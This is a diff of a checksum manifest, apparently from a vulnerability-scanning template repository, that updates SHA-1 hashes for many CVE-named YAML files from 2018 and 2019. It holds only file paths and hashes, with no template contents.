+http/cves/2018/CVE-2018-18570.yaml:b798a41cb7e50801d3a488617513cb1b50c6c790 +http/cves/2018/CVE-2018-18608.yaml:64e72bb9efe88dd889259d024f1c7a9c110de645 http/cves/2018/CVE-2018-18775.yaml:6855fbb7653fb75ebfb58a92e13a94bddd6363e7 -http/cves/2018/CVE-2018-18777.yaml:ba4f0ce809e6bbf9633df218956f1b0cc2842bfa -http/cves/2018/CVE-2018-18778.yaml:137375a1f30ee0567998a4c4a609986093bcefde -http/cves/2018/CVE-2018-18809.yaml:39b8141f44a0ee669fdb7e35058f7c6ff3541fc9 -http/cves/2018/CVE-2018-18925.yaml:21c1e900a4b8a05b95c2f0f557379654ae498afd +http/cves/2018/CVE-2018-18777.yaml:ea3dae45b965ecb5c04b58193b4d02c42b35f99a +http/cves/2018/CVE-2018-18778.yaml:baf90f3ecb18ea7cdeac5c22299da6660e9adcd5 +http/cves/2018/CVE-2018-18809.yaml:5824b2854325d7b2c3099f802316cbf6bbebfaee +http/cves/2018/CVE-2018-18925.yaml:0999c707d20e7674e3316fcb080494b4aa7c2a74 http/cves/2018/CVE-2018-19136.yaml:2cdceec8a347290659292d34e7f91f97f8e8671e -http/cves/2018/CVE-2018-19137.yaml:fd1ff8c639e0ca4f776bbbd0238ca952db2985b1 -http/cves/2018/CVE-2018-19287.yaml:0a56cc461952fb23c4221d0aa334d5464bcf0d36 -http/cves/2018/CVE-2018-19326.yaml:8925ef0ecd6f677aa71bed2457d2f6114a3561dc -http/cves/2018/CVE-2018-19365.yaml:a8399476bc01fdd26608698aae3a117b711b1243 -http/cves/2018/CVE-2018-19386.yaml:2d44c5a61bb7061ad629e54b380561de2a35d38e -http/cves/2018/CVE-2018-19439.yaml:93557a94ecca5127e7adf1697cc5946754c64a21 -http/cves/2018/CVE-2018-19458.yaml:9a1c4ed1055bce227a906e29f4487473d6598c49 -http/cves/2018/CVE-2018-19749.yaml:6cd5dc9be2d13dc800a9ca4f6089838404803360 +http/cves/2018/CVE-2018-19137.yaml:10f56626df0c7fa74817bc38fef21ab7da2bb199 +http/cves/2018/CVE-2018-19287.yaml:740bc06472e431b5cc9bfccf489ab004996c0f3d +http/cves/2018/CVE-2018-19326.yaml:62359b3ae095f6a9b084fa027a12efcc9eba6f69 +http/cves/2018/CVE-2018-19365.yaml:576ff6d8085f14db8b3c1db51e1aa6346c5e4031 +http/cves/2018/CVE-2018-19386.yaml:521152286d482dead5c0d91b75d6246646629049 +http/cves/2018/CVE-2018-19439.yaml:44f03cecf9c0742b6658b1c454bbd93724aa96c4 +http/cves/2018/CVE-2018-19458.yaml:565726e6eeb6e8b7c405013cee2c313b909fa120 +http/cves/2018/CVE-2018-19749.yaml:28104dd3a487cd17227ce25cc9338dff9c08cfde http/cves/2018/CVE-2018-19751.yaml:41a013ed8f511aaea82081e075916ed638b1ebab -http/cves/2018/CVE-2018-19752.yaml:e3d17d1b2dea369da7e33fa13dcf56bb79d148de -http/cves/2018/CVE-2018-19753.yaml:1d0baa4a16b3ec969135a6dc642de67c854ec3a1 +http/cves/2018/CVE-2018-19752.yaml:71e38315bba3bb99c68bb98ae47546e3a8852636 +http/cves/2018/CVE-2018-19753.yaml:20eac71a3629c82df03f7b5d5221e06b8b89b8c2 http/cves/2018/CVE-2018-19877.yaml:31aa058606935cc5babf7d592f92f87aeaf162ec http/cves/2018/CVE-2018-19892.yaml:b0823b9b53093ad710fc09dbdb2e78790f92a200 -http/cves/2018/CVE-2018-19914.yaml:08e33fa9f1fc8a7d48bfc23e9abb3401f0a7eefb -http/cves/2018/CVE-2018-19915.yaml:2c6e0242cea923049907f76a74b85edfab5183eb -http/cves/2018/CVE-2018-20009.yaml:975ad7802a4b86368020631067f9a6ddd0783d48 +http/cves/2018/CVE-2018-19914.yaml:a114f893cf8568e67d37bc14ffe7873fa217c612 +http/cves/2018/CVE-2018-19915.yaml:1611fce07118e7ebc351f355cfdb0433425c89b1 +http/cves/2018/CVE-2018-20009.yaml:ee1015fa79e95b36c728126336f745c57b8234cd http/cves/2018/CVE-2018-20010.yaml:ec78911a377dfae9ce54f561a7d71ba449a741dd http/cves/2018/CVE-2018-20011.yaml:98950dff4dbf42b3759537438082d4166c789270 http/cves/2018/CVE-2018-20462.yaml:70faa7b267536593d4b33427ff677d12deb57cce http/cves/2018/CVE-2018-20463.yaml:9712578b99f890b278c05e83cce8bf9ab31cf93f -http/cves/2018/CVE-2018-20470.yaml:f64b036510d604de04aaf2db6996aa9a248be4b0 -http/cves/2018/CVE-2018-20526.yaml:bdbb51d1ffa66cebc0ae6e78cf40726e8f97a2d9 +http/cves/2018/CVE-2018-20470.yaml:ea3915d1ed278c8a4cbd4f954db50271ba8356f3 +http/cves/2018/CVE-2018-20526.yaml:fbbc6402437df32074a1b2b054e1c0ab9b127a29 http/cves/2018/CVE-2018-20608.yaml:92c17d1974d5042e036f5bfebf8cb2b0fe669c34 -http/cves/2018/CVE-2018-20824.yaml:e9c7b19a982fdbc77a7a6e97718392b2c6fbab01 -http/cves/2018/CVE-2018-20985.yaml:6e840038e5ef9a5d859f4d668036d2121b3fac40 +http/cves/2018/CVE-2018-20824.yaml:6ea5cdd90c960d5ecc05e736199e1a6954baca18 +http/cves/2018/CVE-2018-20985.yaml:4bb634eec7d3375bcddca14b53c76512eba48045 http/cves/2018/CVE-2018-2392.yaml:b0dfd0dc15a700e7739aaea55f5d5aa6fb45b61c -http/cves/2018/CVE-2018-2791.yaml:ec08db845d506ea70eef8190ff46cfbc3ddb4d06 -http/cves/2018/CVE-2018-2894.yaml:f262fb833059893aa4a51846e7312e53cf8844e7 -http/cves/2018/CVE-2018-3167.yaml:273f69df618572a6af4c29fb49751377ba38195f -http/cves/2018/CVE-2018-3238.yaml:5030ec913ae838ffaf3b60ca7be68a434aff3bbe +http/cves/2018/CVE-2018-2791.yaml:31136b756dcfeb64b3f98823a29b78db51519f5b +http/cves/2018/CVE-2018-2894.yaml:118a0c7de50f4a856992bfa9380c946b2f4dd28f +http/cves/2018/CVE-2018-3167.yaml:248b1742e31ca65c14d9ae9a070849d9850b077f +http/cves/2018/CVE-2018-3238.yaml:290f44dd8265304d0a28fe5a8814b51d8a7a3a56 http/cves/2018/CVE-2018-3714.yaml:467fa520a83d33a07e51718f5bcb3c358beea1d4 http/cves/2018/CVE-2018-3760.yaml:90f7093f1e64c13dea1afaee2fe85b1fcef938ff http/cves/2018/CVE-2018-3810.yaml:2d56de0a9b2c76b6aad57d50302dbcf26a90e6b2 -http/cves/2018/CVE-2018-5230.yaml:65c5eec3102fa06c52d29003683038ce945e7a29 -http/cves/2018/CVE-2018-5233.yaml:2810f960e2057833a3a224cc7cf41556f23a6a2b +http/cves/2018/CVE-2018-5230.yaml:9c084e311280bf0b0b4e0ea9b249b7a0b20c67de +http/cves/2018/CVE-2018-5233.yaml:437e02a1ebdd20198ef1456d32007910ae09cf2f http/cves/2018/CVE-2018-5316.yaml:fe0e4112fa6a7f2918925dff5501b19680026501 -http/cves/2018/CVE-2018-5715.yaml:1c44d1785af1d90a1bf56c7d71710399f35ef6c4 -http/cves/2018/CVE-2018-6008.yaml:34f83b3b57e8d26d90647da2d70c4e7b7dd60380 -http/cves/2018/CVE-2018-6184.yaml:fc991ad3b4fc4ef0b2c379ec4795279b8b806f77 -http/cves/2018/CVE-2018-6200.yaml:dfead2b2caa43616b1debefbee4bf46566978351 +http/cves/2018/CVE-2018-5715.yaml:d7a49108189cfcd6c75a6cac00344fe146dff4d8 +http/cves/2018/CVE-2018-6008.yaml:d9b979c4b3813f317c2efe8206d4e8a5b1215e3e +http/cves/2018/CVE-2018-6184.yaml:1ea895f0a16a76f223dd4812f77b50d84bec0703 +http/cves/2018/CVE-2018-6200.yaml:7588192682a4ac8c00d7c6a83621103dd23e0c8d http/cves/2018/CVE-2018-6530.yaml:a7ec85a12911cc378322baaa7a1912ca731ce631 http/cves/2018/CVE-2018-6605.yaml:9395411144d77cf69a9f241d6eac574be3803a3a -http/cves/2018/CVE-2018-6910.yaml:5cdd602b4a3ee04e69fd5bb65014b372ffd67e77 -http/cves/2018/CVE-2018-7251.yaml:3173253cec72ee76a5cb9d69a05f0339ee638caa -http/cves/2018/CVE-2018-7282.yaml:322b1e3e3ceb2f4b4c37b987be40cf148fbe1b61 +http/cves/2018/CVE-2018-6910.yaml:c84b3d5ba116c18bc9f605d5f208a7392d2bc5b4 +http/cves/2018/CVE-2018-7251.yaml:35bdb470f05dec3b89486bd31a38d23be7d85346 +http/cves/2018/CVE-2018-7282.yaml:5f91f643f99ad1bcc155f74d02c0cf692383611a http/cves/2018/CVE-2018-7314.yaml:bd70e733cbf74d122f249c148b42dab8ddacb60f http/cves/2018/CVE-2018-7422.yaml:e3c039258631c4bcd6be9a250683a659c30589e4 -http/cves/2018/CVE-2018-7467.yaml:714eccac0c1d375748ece0da2b87c68d27a461bd +http/cves/2018/CVE-2018-7467.yaml:1b0142f9c76787034d813d1cb3bf1d803ab77c63 http/cves/2018/CVE-2018-7490.yaml:569286ff6beffe744aed0915b8d887e6921ee84b -http/cves/2018/CVE-2018-7600.yaml:3d30ed4f3a3f787ed1a31a95852b86bcabafc09a -http/cves/2018/CVE-2018-7602.yaml:9528f0b81c634579fb58bf3feb93049ed6deac9b -http/cves/2018/CVE-2018-7653.yaml:d52e4702df453fcf5b2a641b564ada02cdc1f32e -http/cves/2018/CVE-2018-7662.yaml:d8f5272bb557b3f06386824fbd5ad3ac6d91f62f -http/cves/2018/CVE-2018-7700.yaml:339dc5c02de55e6e0589ac79da7425a56064185c +http/cves/2018/CVE-2018-7600.yaml:c000552581e79c98057d74f9da4a469bcf5ec93f +http/cves/2018/CVE-2018-7602.yaml:d463f1fde61db5200400511b3ffdb63f0d8c0d64 +http/cves/2018/CVE-2018-7653.yaml:b96ae7482cb6da1010b5f9262dbea86982fdc147 +http/cves/2018/CVE-2018-7662.yaml:f227ce3aa502c6302dbe55932d703c645119b1c6 +http/cves/2018/CVE-2018-7700.yaml:51f8418b0b9929da6e5a02acd58ea51d47a61bf0 http/cves/2018/CVE-2018-7719.yaml:47cab26137d85e8909949d13e765303fb157f35e -http/cves/2018/CVE-2018-8006.yaml:11820c48004a18fd909fa35b6022d85c9203a9b8 -http/cves/2018/CVE-2018-8033.yaml:ed36027558a45eb525720fa1f9b07b85f65d2a05 -http/cves/2018/CVE-2018-8715.yaml:845d59d1e0942c3760c2d843b177157d5b31da54 -http/cves/2018/CVE-2018-8719.yaml:bfb5ceeb330f74172c117e625fe69e8e10197361 +http/cves/2018/CVE-2018-8006.yaml:3b6d44bf0fe24307cfd762aa476b70b45ab9ce11 +http/cves/2018/CVE-2018-8033.yaml:1413436dc458d3d24ef1b6ef0516fb29b82bd0e4 +http/cves/2018/CVE-2018-8715.yaml:d4851d7cc81088c538c4f3b2a73af93400e44e0e +http/cves/2018/CVE-2018-8719.yaml:78364732d8025f076c2a124f70afd3e5bd934968 http/cves/2018/CVE-2018-8727.yaml:fc1c33f0a40fc19bbd5c77e8bc0a71e35d54e56d http/cves/2018/CVE-2018-8770.yaml:697c1ba6a15230f9f9f2ce2899ebefc4fc0ef068 -http/cves/2018/CVE-2018-8823.yaml:841bfa50c0524f4b3dea7995e28c5c314b15ac27 -http/cves/2018/CVE-2018-9118.yaml:7bf016eaceeefb7d38e88c7841928d26f601f581 +http/cves/2018/CVE-2018-8823.yaml:acf4fbf0c8efd75fa11f47e4bce90db39d83af47 +http/cves/2018/CVE-2018-9118.yaml:4c13276c78e4d2e73f19a54a77115b4c4a48aae6 http/cves/2018/CVE-2018-9161.yaml:f98357d745d30e54b9a0f949e05f38ae29148319 -http/cves/2018/CVE-2018-9205.yaml:ddc94395c8fd94dd7f3dfd5d521c88d2a18d1293 +http/cves/2018/CVE-2018-9205.yaml:1499d18423846d499f720c4264a44ad75f27f93f http/cves/2018/CVE-2018-9845.yaml:1d90b0a63da858688c950787f350bc620243c869 http/cves/2018/CVE-2018-9995.yaml:1acb8eb87312ef544059faa23df771316f81e41d -http/cves/2019/CVE-2019-0193.yaml:1315152b6f01340007acd5426780992d9823ce27 -http/cves/2019/CVE-2019-0221.yaml:58497e316e0aa43087705825cf0b213ee8d13d21 -http/cves/2019/CVE-2019-0230.yaml:e303dedee56203e94933d761fc9ffd427f22b090 -http/cves/2019/CVE-2019-10068.yaml:372682e6aa3ccb83aaf474bccba5f4b103796745 -http/cves/2019/CVE-2019-10092.yaml:d9d774da89cff5cf78b56c38b569f2a093dab139 -http/cves/2019/CVE-2019-10098.yaml:5295a08794823dd689b4a8597f5d10f51191197f +http/cves/2019/CVE-2019-0193.yaml:5895cee3d3ed5862b9cd6e0d90007292231a467f +http/cves/2019/CVE-2019-0221.yaml:a60272d48feb8c14024507bad12a828ddb1bdf8e +http/cves/2019/CVE-2019-0230.yaml:5bea44b0e336d65b242265604818831f218831b5 +http/cves/2019/CVE-2019-10068.yaml:490f5b18e6a9df7eea47ff5973a4ef6917eb3e84 +http/cves/2019/CVE-2019-10092.yaml:95036721a0c5900e3a43158830752db468be81ab +http/cves/2019/CVE-2019-10098.yaml:87e95f3b56cfc09f00ff2b41cd42e53aea290fe8 http/cves/2019/CVE-2019-1010287.yaml:cec033f9ac31aaf83bd80c9279ab5a7aed4b890a -http/cves/2019/CVE-2019-1010290.yaml:fd5a6b728a89be5e21149ba9b9ddf9fd0add141d +http/cves/2019/CVE-2019-1010290.yaml:a264cb928c69ab6428e128c0ee33d265634e2fc2 http/cves/2019/CVE-2019-10232.yaml:713f169c89ece5300e52e0bc987370371d9b3573 -http/cves/2019/CVE-2019-10405.yaml:9c26c8436451083f65afdc4c91524a483af73c8e -http/cves/2019/CVE-2019-10475.yaml:4a159a11f75f8e287a519514c93eb55af3a1173b -http/cves/2019/CVE-2019-10692.yaml:b6b4abd2fcde505f79a4b4c2c942ed242d967edd -http/cves/2019/CVE-2019-10717.yaml:087d9a5aa47b927d396fc4b7752b03de3782ebbf -http/cves/2019/CVE-2019-10758.yaml:3a79381a7eeb08f38bd8f5f6c862fc7c1f05c5d6 +http/cves/2019/CVE-2019-10405.yaml:48da2adabbe91b7c6fc6e17540d8905a684e0432 +http/cves/2019/CVE-2019-10475.yaml:95b5f0bc9f584b4e7c2c7b39fa2de8560c35c198 +http/cves/2019/CVE-2019-10692.yaml:e03cfcc646b10b50f803898d7416ba908c049add +http/cves/2019/CVE-2019-10717.yaml:9c839238a9f9cca85816c8eaa99416c353849633 +http/cves/2019/CVE-2019-10758.yaml:5e68af684ce511d788c47f865c3b01ed1abc280c http/cves/2019/CVE-2019-11013.yaml:2ad66e116c4d085161542c51376f4c68df78c478 -http/cves/2019/CVE-2019-11248.yaml:5124a8a18753e96e412cceb36a590249f61fc296 -http/cves/2019/CVE-2019-11370.yaml:df484ba9eda9562fce57052043fe7e6bcc20c892 -http/cves/2019/CVE-2019-11510.yaml:37ce5da29efdabcad9bbe9ed562d39ff4af92988 -http/cves/2019/CVE-2019-11580.yaml:0960dfb042ac587bf860280f1c682f7c95ebc4d8 -http/cves/2019/CVE-2019-11581.yaml:f29ac5a617fd6582e8416d89f0e96fc75fee02fd -http/cves/2019/CVE-2019-11869.yaml:554296f0a9b3b597f433271e96c94945b1a1e2eb -http/cves/2019/CVE-2019-12276.yaml:d46baca1545e6e8549012c7397daf86a7a6b23e4 -http/cves/2019/CVE-2019-12314.yaml:b86487969cfe1c1e84e842d93a500fb71e3964fa -http/cves/2019/CVE-2019-12461.yaml:3068bf62d30fc8534e65663178590794413f5aaa -http/cves/2019/CVE-2019-12581.yaml:6543be0bceac3b6b2e2f725167baeacccc790117 -http/cves/2019/CVE-2019-12583.yaml:ea1f2ee731644d9b9ff35227124b5f9deedc57ff -http/cves/2019/CVE-2019-12593.yaml:73dc1dd1b2adcf7e32f17dfd589b907e7b9856c5 -http/cves/2019/CVE-2019-12616.yaml:cb73607b6fa9ebb0e404e6fd23a996b5f567a2d4 -http/cves/2019/CVE-2019-12725.yaml:ed7b7dd0f24be6fc9e460590f4ed3cab3430b5c1 -http/cves/2019/CVE-2019-12962.yaml:4799a7b0f606ddb24efafe013cff6f4993535b96 -http/cves/2019/CVE-2019-12985.yaml:014126b5bea9dec1b4e8f11d2ae3b711f037b376 -http/cves/2019/CVE-2019-12986.yaml:05937e0d453d00b1c43afd669e3774b7d5bf06a4 -http/cves/2019/CVE-2019-12987.yaml:282eff1208d350bf7bebfa8827f318c133bb66c9 -http/cves/2019/CVE-2019-12988.yaml:197577eac25a532f0584f5822f1c60392d838f05 -http/cves/2019/CVE-2019-12990.yaml:9e48d7926d2162a4aef49feac4d58cd390d04f82 -http/cves/2019/CVE-2019-13101.yaml:a2a632e54cddccaee9effe4844f8a873b728dc35 -http/cves/2019/CVE-2019-13392.yaml:17334f15559dd076fab6f71057a6d17bd81e6479 -http/cves/2019/CVE-2019-13396.yaml:edc16e834ab7130bd4a78f1dce409fe9bb1a2297 -http/cves/2019/CVE-2019-13462.yaml:d5f61f3b4adc7f30143d5cb225f9529d89ba0b69 -http/cves/2019/CVE-2019-14205.yaml:794ebe6439f61bfe64973e2790e46f152ceb55b0 -http/cves/2019/CVE-2019-14223.yaml:bfa751b74191106c210a2899db25813c7ff78181 -http/cves/2019/CVE-2019-14251.yaml:e5edfce134c1c8362fec90ac0650c81dfc2ca49f -http/cves/2019/CVE-2019-14312.yaml:128399e7d4367691df73cd65e3e74aee03220533 -http/cves/2019/CVE-2019-14322.yaml:8a5f7120a05939ac777c37d4265cac8d83a8e347 +http/cves/2019/CVE-2019-11248.yaml:69bf371a2ae74df3a820ec654e531183cd52d586 +http/cves/2019/CVE-2019-11370.yaml:7bb4da17ad5c55a29cab53cae1ff9e90da64e689 +http/cves/2019/CVE-2019-11510.yaml:d6e6d6ad78a3445f60bb6e8dc75b37f289293c7c +http/cves/2019/CVE-2019-11580.yaml:a8e99a85051c0f58b7c7ddb91fd590639e1f0b62 +http/cves/2019/CVE-2019-11581.yaml:0962a26453640de4363d4e0ca655b9ee0d8598fc +http/cves/2019/CVE-2019-11869.yaml:223e8fbfc472a62769340c41f0017a013b42fc6d +http/cves/2019/CVE-2019-12276.yaml:fb5177e00a08d1ba5ec2ed962b12056e8d3a5fe9 +http/cves/2019/CVE-2019-12314.yaml:45e5093a3ac421643dcc25859931c3b6ba9057f6 +http/cves/2019/CVE-2019-12461.yaml:e59515dfc19f812aafa8c4b0bdad9c28b65ff574 +http/cves/2019/CVE-2019-12581.yaml:12e619fd37b7542432f3e428fb46b1a23b80f81f +http/cves/2019/CVE-2019-12583.yaml:839bb71239abe5bf41aad959223aad3708482b5b +http/cves/2019/CVE-2019-12593.yaml:dc9651e2d0787a3835e6295e77f9712c5db91236 +http/cves/2019/CVE-2019-12616.yaml:5695c1a6d55803b3e91baa1665080f813a00f390 +http/cves/2019/CVE-2019-12725.yaml:eb150ec0f37948a8e69b924d384e5f3f5d8a53a8 +http/cves/2019/CVE-2019-12962.yaml:5328204943985ad35ed0950cb5ccf286f1fa4c19 +http/cves/2019/CVE-2019-12985.yaml:48d3aa004dc4ae95cef74e06075943140c4a9ebc +http/cves/2019/CVE-2019-12986.yaml:00a8b35ba0b68e57a067fd139f7e7f52e8f843f9 +http/cves/2019/CVE-2019-12987.yaml:da3ea360d3019964911b678511236af53c41f6a7 +http/cves/2019/CVE-2019-12988.yaml:dd6ba95dbd27857f3fe47ca526dbff0f0e58e938 +http/cves/2019/CVE-2019-12990.yaml:d0773ec188e357d710146736e3af8a86e9319348 +http/cves/2019/CVE-2019-13101.yaml:ae9d95abb521c1b79cce351d330dc3b42e84070b +http/cves/2019/CVE-2019-13392.yaml:ce2b84675b816ead08f4912d7f894cf7cc7ac516 +http/cves/2019/CVE-2019-13396.yaml:cd8a877aba811f643970cfea627a30bc48b29bec +http/cves/2019/CVE-2019-13462.yaml:c06836b489a7942902428ef9c03baeb649cff019 +http/cves/2019/CVE-2019-14205.yaml:d57f3dd988d8000bb5d2a513d4f51cda75496cd2 +http/cves/2019/CVE-2019-14223.yaml:3be945555ecd14072d1bf7d87ef59f0e29c73ddd +http/cves/2019/CVE-2019-14251.yaml:2cd3f4fb3bb8ec7706366410a493577aa6ecddf0 +http/cves/2019/CVE-2019-14312.yaml:65fa579c20b881c49bd5fbadb68612d6aeea7765 +http/cves/2019/CVE-2019-14322.yaml:d243539818020519b68411124848fbd58922df93 http/cves/2019/CVE-2019-14470.yaml:feb43273bc10cccf96b8e1fdfa8c3973442039ad -http/cves/2019/CVE-2019-14530.yaml:a21235c8b43e59e40ad7d3c2372f53d54c794e99 -http/cves/2019/CVE-2019-14696.yaml:1d95b7c9e1cd841802f6ff592239bb2da0ebf1bf -http/cves/2019/CVE-2019-14750.yaml:6ca5ded0c6a2a0b01ec4fbd07a1c9d316532590d -http/cves/2019/CVE-2019-14789.yaml:9e084e98af571982c3541d7b6df97d5d4b5371cb -http/cves/2019/CVE-2019-14974.yaml:fab66c9fa2671fd957b866861070cf1f0c449e35 -http/cves/2019/CVE-2019-15043.yaml:2d8e17268051d372dd87356dd19d8ca95a03fd7a -http/cves/2019/CVE-2019-15107.yaml:a16ecd8b3d5b44ace9cc052b714f37939fb71209 -http/cves/2019/CVE-2019-15501.yaml:0ec7b6f2b9c32e42fafcea63e3fae54f222029e4 -http/cves/2019/CVE-2019-15642.yaml:19722b53950dd208a69868820a54683b5f9df13d -http/cves/2019/CVE-2019-15713.yaml:781dff249c59787481d73a69c64aacd876696fd6 +http/cves/2019/CVE-2019-14530.yaml:014ef9f12577fee10e36847921273da870dd6ef0 +http/cves/2019/CVE-2019-14696.yaml:8bb0920522198a471f418d5106d40090b74d447f +http/cves/2019/CVE-2019-14750.yaml:737327d2f4497b21934509672c8a1c94a275a460 +http/cves/2019/CVE-2019-14789.yaml:9abfb241c4372064325299d720740ad9ff35c0cb +http/cves/2019/CVE-2019-14974.yaml:5c660e5883ab8bc860a41cea3b9bcc1e77e15b63 +http/cves/2019/CVE-2019-15043.yaml:3567875d44a426e9b0524f0f3ff3fdcb519932d1 +http/cves/2019/CVE-2019-15107.yaml:cc948e3dce86ff30d549a30c11561d60446b9ee5 +http/cves/2019/CVE-2019-15501.yaml:ddc8d6187b18cc11941668ab296fc15a79c0dde6 +http/cves/2019/CVE-2019-15642.yaml:59ceb63e7c806e8540159a3f39c44aaa92a154af +http/cves/2019/CVE-2019-15713.yaml:10e07c10f196b1400a503b97ad125903ed1adbb8 http/cves/2019/CVE-2019-15811.yaml:f14050a032d55ce2ae1959a23cb97fe4cc75e464 -http/cves/2019/CVE-2019-15829.yaml:04ddd730b7a1a6d44a336c026f75498bae79bec9 -http/cves/2019/CVE-2019-15858.yaml:eb8403399fcdbd8ce9a21529f60bfbf5988e172d +http/cves/2019/CVE-2019-15829.yaml:d93dae607fbbfda1f268030ff115744eda65f509 +http/cves/2019/CVE-2019-15858.yaml:dd0e88830d6f0a234634472d109bda9140c02c6a http/cves/2019/CVE-2019-15859.yaml:45fdb86453346868de8338e41b0f108ee04042fc -http/cves/2019/CVE-2019-15889.yaml:e7a0826e403bb9e010db73d1b13501080fd0217c -http/cves/2019/CVE-2019-16057.yaml:78eb40dc6d8f29b5201301f3c2bc6f04eebfdd1a -http/cves/2019/CVE-2019-16097.yaml:1cdd486d70f786e7904e3a7d94a8dd7cbf1ef8df +http/cves/2019/CVE-2019-15889.yaml:3ef52eea70d7104a5109ff788384c3621e76a0a9 +http/cves/2019/CVE-2019-16057.yaml:a150d97bc24b0a958ee98070fde580a880be1c13 +http/cves/2019/CVE-2019-16097.yaml:be89395f00bc61330f2b6483c9295c1d39768fb5 http/cves/2019/CVE-2019-16123.yaml:9b28bd8cc89e8a3286374b34dd60bfcce4fe27d0 -http/cves/2019/CVE-2019-16278.yaml:2cbf9691cd4104d2b340cd4d5e6925a41df947e3 +http/cves/2019/CVE-2019-16278.yaml:d4149d9e0cf739bdaac6caec400e0b9fe8be159c http/cves/2019/CVE-2019-16313.yaml:2379d3c097b5e6a2915c5b8874f8700eff6656f2 http/cves/2019/CVE-2019-16332.yaml:6fc333ecc72bb9ae7f7cf1a81bf0e63501faee48 -http/cves/2019/CVE-2019-16469.yaml:6e85e9115e6650cd09da4d24f619843b9bc7ac11 +http/cves/2019/CVE-2019-16469.yaml:e350011c828be2e66f871dd7b339fe9bcd151ff3 http/cves/2019/CVE-2019-16525.yaml:51db7d84c840ddecfabe91c8b79dffc9e85b0700 http/cves/2019/CVE-2019-1653.yaml:8fbf1f7164f46c7bf4fbc5a14bdf3c6bc17fc9ce -http/cves/2019/CVE-2019-16662.yaml:74f125a17be26af500bd726d9b5ab3861d713e2a -http/cves/2019/CVE-2019-16759.yaml:cbf9b83765f0228de77c73210d6d419fd8fd442c +http/cves/2019/CVE-2019-16662.yaml:9229e08486910b48989f08049c83d04a45daf59b +http/cves/2019/CVE-2019-16759.yaml:b14316e4ddccd5f1593266fc28ac98d8d41f6312 http/cves/2019/CVE-2019-16920.yaml:865e89896464d2b4a5e61700021863096a8a2bd2 -http/cves/2019/CVE-2019-16931.yaml:d23e42b9b1dfd58ff1c5a89e26993c94e1cfd7b7 +http/cves/2019/CVE-2019-16931.yaml:c4ce5984023bdfde781c4fa8b19a8b782f2c9e09 http/cves/2019/CVE-2019-16932.yaml:752a6400d3e725e0709b45b312927f30d3d82162 http/cves/2019/CVE-2019-16996.yaml:6af14042b97fa925502d1c0b180890cb8f30b9ac -http/cves/2019/CVE-2019-16997.yaml:32f2b19fd4b728b9f693d17169d7f74b32689d68 +http/cves/2019/CVE-2019-16997.yaml:b7e350a4629c6352013831586ca26ecb0020851f http/cves/2019/CVE-2019-17270.yaml:d48604df6ef77def3e7fa1c9f6f916233f0cf6e3 -http/cves/2019/CVE-2019-17382.yaml:de2261176c45bd15fbfbdae01f6bf94e23cc57e3 +http/cves/2019/CVE-2019-17382.yaml:3c990cd6c5d0427e09eac074017e4a235b0fe06f http/cves/2019/CVE-2019-17418.yaml:09d65f801c6153058cda117d92049c4ae9580a07 -http/cves/2019/CVE-2019-17444.yaml:c6adc210bdcaf5fcbf8dc37346fabe38ebacd346 +http/cves/2019/CVE-2019-17444.yaml:fe7925cc25fd290827df56c3772006ff4f4daa72 http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671 http/cves/2019/CVE-2019-17506.yaml:b0db1a0dd94538fede1011a56f7f41708dc89d6d -http/cves/2019/CVE-2019-17538.yaml:7a34111b1b615caf71f0d479eb8b6cc5e465ac29 -http/cves/2019/CVE-2019-17558.yaml:8f153604065b9c7744bd2246865b2e87c00e053b -http/cves/2019/CVE-2019-17574.yaml:892d01b36db1255d8007f717c1fb6c4d4f802588 -http/cves/2019/CVE-2019-17662.yaml:e6e3f40e798aad8fd78fb6f897f0a7ecae4a817d -http/cves/2019/CVE-2019-1821.yaml:d19e01b6b92ea25c70d576bb415da93aee8d4f0f -http/cves/2019/CVE-2019-18371.yaml:cb87df6d841c8de310c9421503698b22fe4689a7 -http/cves/2019/CVE-2019-18393.yaml:2fa5d07a297e08f62fe65b85a66468d1e91456e2 -http/cves/2019/CVE-2019-18394.yaml:f58089be77e0e2f5e5a34839f3c60d4715924666 +http/cves/2019/CVE-2019-17538.yaml:e427655cb8a73e608adee628c3ca459b713921ee +http/cves/2019/CVE-2019-17558.yaml:9750af36fb5994404b46600389c124d00ebb9113 +http/cves/2019/CVE-2019-17574.yaml:4ba50fc7133a0618d27bceb9b14c83dcb34a38c4 +http/cves/2019/CVE-2019-17662.yaml:8e6fedc5549df29f3f224e263ef72013c5672dbd +http/cves/2019/CVE-2019-1821.yaml:4325f02bbf036da272e74d6c0bd97165d27bfe47 +http/cves/2019/CVE-2019-18371.yaml:fec092d5d3baa9fdd72fa9d57474ff90a3bbfa37 +http/cves/2019/CVE-2019-18393.yaml:0a5fa73baf012eea8c099130c6e6bc6e8a9f4aec +http/cves/2019/CVE-2019-18394.yaml:ee24803bb21344bb3567f8acc905623730d90184 http/cves/2019/CVE-2019-18665.yaml:ddd5fc6661c5a4d13da8ecba440daf78f4dec7f0 http/cves/2019/CVE-2019-18818.yaml:c8f04d93a506f8d1d801ba19e51d1dc4f5005d43 http/cves/2019/CVE-2019-18922.yaml:95118c0faac56d9ab7f7c0731d9ffd8d37413f74 http/cves/2019/CVE-2019-18957.yaml:0fa1c55cdae830f3c0a64b01886c2ec2c4f769b9 -http/cves/2019/CVE-2019-1898.yaml:f0f71275ec7d10e813cd556632ba7342580eced0 +http/cves/2019/CVE-2019-1898.yaml:d6da27d5250a3f1699b7332444d4276e0f6eb3dd http/cves/2019/CVE-2019-19134.yaml:3db2b49e04e2ee29182af1285b416361be36a428 -http/cves/2019/CVE-2019-19368.yaml:dd2b3f21190be0cf7506aa1910fce2e2ac085baf +http/cves/2019/CVE-2019-19368.yaml:c6ca0ce8b465ba621c9953b40ce5cf83f5e4d90a http/cves/2019/CVE-2019-1943.yaml:866d0aa9df67c656e9ff6b133d795e5da483b26b http/cves/2019/CVE-2019-19781.yaml:8818dd71d9de019748689ab135368ea27178f8ae http/cves/2019/CVE-2019-19824.yaml:32d5ce9eb42b06926942b7aa6aa1dad1436e97ac http/cves/2019/CVE-2019-19908.yaml:9f9fc75caaf52382b3e1342991443b636e222ae0 http/cves/2019/CVE-2019-19985.yaml:8f1e3cb36997db32ba57b1270de3f5692db1264a -http/cves/2019/CVE-2019-20085.yaml:b12a595f2f94c500147d19dc78114c8fb8b4d23f -http/cves/2019/CVE-2019-20141.yaml:ff23736b1373f16c104fcb0994fd115aa0dbd943 +http/cves/2019/CVE-2019-20085.yaml:7a89305d4926c92ba6536f6fff5a2f6eb2eecf77 